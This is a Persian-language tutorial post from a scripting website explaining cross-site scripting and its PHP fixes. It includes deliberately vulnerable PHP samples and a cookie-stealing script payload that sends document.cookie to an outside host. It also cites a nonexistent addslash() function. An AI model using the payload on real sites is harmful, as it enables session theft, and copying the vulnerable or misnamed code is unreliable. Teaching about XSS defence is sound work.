گلریزوب

مرجع اسکریپت و کد نویسی

محل نمایش تبلیغات شما کسب درآمد محل نمایش تبلیغات شما محل نمایش تبلیغات شما

میزکار کاربری
Panel

عضویت سریع
نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
ورود کاربران
نام کاربری
رمز عبور

محصولات پر بازدید
Favorite Posts

لینک های سایت
Links

صفحات جداگانه
Extra Pages

آخرین محصولات
Recently Posts

آخرین نظرات کاربران
Recently Comments

رها
رها درتاریخ 1398/3/28 گفته :
میشه برام ایمل کنید نیتونم دان کنم .با تشکر
amin
amin درتاریخ 1398/3/15 گفته :
نظر من تایید نشد ولی باگ گیری کنید بک خوبیه
مهران
مهران درتاریخ 1398/3/14 گفته :
ارسال ویس نداره به درد نمیخوره
محمد مهدی
محمد مهدی درتاریخ 1398/3/11 گفته :
این باگه یا اسکریپ
البته تاپ طرح اسکریپ نداره این مال یزد طرحه
amin
amin درتاریخ 1398/2/8 گفته :
این بک کلا نصب نمیشه کلا اررومیده من نصب کردم اررو سرور داد
آخرین ارسال های تالار گفتمان
هر آنچه که در انجمن در حال رخ داد است !

http://s5.picofile.com/file/8163781500/%DA%A9%D8%A7%D9%88%D8%B1_%D9%BE%D8%B3%D8%AA.png 

در این پست شما را با نحوه رخ دادن حملات xss آشنا می کنم./

این حملات زمانی رخ می دهد که یک سایت کد مخرب از کاربر دریافت کند و این کد از طریق این سایت در کامپیوتر قربانی مورد پردازش قرار گیرد. در واقع نفوذگر کد مخرب خود را که بر پایه دستورات html,JavaScript,Css هست را به سایت آسیب پذیر وارد کرده و سایت بدون هیچ فیلتر و یا پردازش ورودی این کد را بر روی کامپیوتر قربانی اجرا می کند./ این روش بیشتر برروی نفوذ از طریق کاربران تمرکز دارد./

این حمله از اعتماد یک کاربر به سایت سوء استفاده می شود و بر اساس همین اعتماد کدهای تزریق شده برروی کامپیوتر قربانی اجرا شده و این کدها می توانند هویت این کاربر را نزد نفوذگر افشا کنند./

حملات xss به صورت مختلفی پایه گذاری می شوند:
- فرستان یک لینک به کاربران مجاز: در این روش نفوذگر یک لینک را به کاربر ارسال می نماید و کاربر را ترغیب به رفتن به این لینک می نماید که متاسفانه پس از کلیک کد برروی سیستم قربانی اجرا می شود./

- اجرای کد توسط سایت مورد اعتماد کاربر که از آن بازدید می نماید: ممکن است شما نیز به دام این حمله افتاده باشید و پس از مشاهده یک پیغام و یا پست در سایت مورد علاقه خود مورد حمله قرار گرفته باشید. معمولا در تالارهایی که امکان استفاده از کدهای جاوا و html وجود دارد این نوع حمله قابل مشاهده است.

- کدهای مخرب ارسال شده توسط یک کاربر برای دیگر کاربران: در طول روز با سایت های زیادی بر خورد می کنید که ممکن است در هرکدام از این سایت ها امکان ارسال نظرات و پیام برای شما میسر باشد. حال اگر این پیام بدون هیچ کنترل و فیلتر مورد پردازش قرار گیرد نتیجه چیست؟؟؟ بله قطعا فاجعه برای کاربرانی که به این سایت اعتماد کرده اند و ممکن است تمامی اطلاعاتشان در خطر قرار گیرد.

کد زیر را در نظر بگیرید:

 

 <?php
if (isset($_POST['message'])){
   file_put_contents('board.txt',"{$_POST['message']}<hr/>",FILE_APPEND);
}
$messages=file_get_contents('board.txt');
echo $messages;
?> 

 

در این مثال متن گرفته شده از کاربر بدون هیچ پردازشی در فایل board.txt قرار گرفت تا برای کاربران نمایش داده شود.
حال اگر نفوذگر کد زیر را وارد نماید:

 

<script>document.location='http://silentDi3.co.cc/cookieGraber.php?cookies='+document.cookie</script>

 

نتیجه آن می شود که هرکاربری مجاز سایت از این نظر و این قسمت مشاهده نماید کوکی مورد استفاده این کاربر برای نفوذگر ارسال می شود./

 

 

---------------

حالا نحوه ی پچ کردن باگ xss رو با هم بررسی میکنیم.

همونطور که توضیح دادم این باگ عموما بر اثر بی توجهی و عدم بررسی ورودی ها رخ می دهد./ حالا اگه ما ورودی ها رو چک کنیم دیگه جای هیچ مشکلی نمی مونه./ کد زیر را در نظر بگیرید:

 

 <?php
$temp = $_GET['search'];
echo $temp
?> 

 

همانطور که مشاهده می کنید این یک کد آسیب پذیر به باگ xss است./ در زیر به روش های پچ این باگ می پردازیم.

1- استفاده از تابع addslash() : این تابع یک اسلش به ورودی های مشکوک به این حمله اضافه می کند( مانند: ',",...)

 

 <?php
$temp=addslash($_GET['search']);
echo $temp;
?> 

 

این روش یک روش معمول و پر استفاده می باشد اما ایمن نست و به راحتی قابل دور زدن است.!

2- استفاده از تابع htmlspecialchars() : کار این تابع این است که تمامی کاراکتر های استاندارد زبان html را به کد شده آن تبدیل می کند که دقیقا همان کاراکتر ها را در خروجی نمایش می دهد./

 

 <?php
$temp=htmlspecialchars($_GET['search']);
echo $temp;
?> 

 

این روش می تواند روش موثری در برابر این نوع حملات باشد.

3- استفاده از تابع htmlentities() : این تابع نیز دقیقا مانند تابع بالا عمل کرده و از عملکرد مناسب تر و دقیقتری برخوردار است:

 

 <?php
$temp=htmlentities($_GET['search']);
echo $temp;
?> 

 


4- سایر روش های جلوگیری: این روش ها بستگی به خلاقیت برنامه نویس دارد و اینکه از کدام روشها استفاده نماید./

 


طراحی چت روم

دسته : نکات و دستورات چت روم , ,
می پسندم نمی پسندم
تاریخ : جمعه 24 / 10 / 1393 ساعت : 16:18
نظرات
نظرات مرتبط با این پست
برای دیدن نظرات بیشتر روی شماره صفحات در زیر کلیک کنید
نام
آدرس ایمیل
وب سایت/بلاگ
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

آپلود عکس دلخواه:







درباره سایت
About Us

سلام دوستان گلم خوش امدید لحظات خوشی را برای شما ارزومند هستیم امیدوارم از مطالب ما استفادهی کافی رو برده باشید
دسترسی آسان
Easy Access
آمار سایت
Statistics
تعداد مطالب : 2046
تعداد نظرات : 3915
تعداد کاربران : 1644
امروز :
تعداد اعضای سایت : 1644
تعداد اعضای آنلاین : 6
بازدید امروز : 7012
بازدید دیروز : 847
بازدید هفته : 23550
بازدید ماه : 116261
بازدید سال : 1288225
بازدید کل : 11047305
نویسندگان
Author
امکانات وب
Codes

خبرنامه وب سایت: